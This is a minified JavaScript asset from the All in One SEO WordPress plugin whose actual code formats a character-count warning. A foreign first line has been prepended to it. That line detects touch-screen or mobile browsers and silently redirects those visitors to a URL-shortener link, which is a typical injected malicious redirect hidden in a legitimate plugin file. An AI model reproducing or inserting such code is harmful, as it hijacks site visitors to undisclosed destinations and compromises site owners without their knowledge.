(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import"./app-core.c8323d51.js";import{a as r,_ as s}from"./vendor-other.39e59221.js";const e="all-in-one-seo-pack",l=()=>({maxRecommendedCount:(n,o)=>{const t=n>o?' class="error"':"";return r(s("%1$s out of %2$s max recommended characters.",e),`<strong${t}>${n}</strong>`,`<strong>${o}</strong>`)}});export{l as u};
